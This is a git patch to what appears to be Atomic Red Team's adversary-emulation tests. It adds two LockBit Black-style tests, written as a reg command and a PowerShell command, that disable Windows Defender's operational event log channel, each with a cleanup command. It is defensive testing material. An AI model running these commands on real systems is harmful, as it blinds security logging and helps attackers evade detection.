From b31a0b6484bd363d1a0ca2ef0e473834ad021a6e Mon Sep 17 00:00:00 2001
From: arames13 <91679765+arames13@users.noreply.github.com>
Date: Wed, 3 Aug 2022 10:06:14 -0500
Subject: [PATCH] T1562.006-update (#2066)

Co-authored-by: anupama ramesh <aramesh@nti.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1562.006/T1562.006.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)

diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml
index 37d92628..23263616 100644
--- a/atomics/T1562.006/T1562.006.yaml
+++ b/atomics/T1562.006/T1562.006.yaml
@@ -129,3 +129,29 @@ atomic_tests:
     cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
     name: powershell
     elevation_required: true
+- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
+  description: |
+     An adversary can disable the ETW Provider of Windows Defender,
+     so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
+  description: |
+     An adversary can disable the ETW Provider of Windows Defender,
+     so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational  -PropertyType DWord -Value 0 -Force
+    cleanup_command: |
+       Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
\ No newline at end of file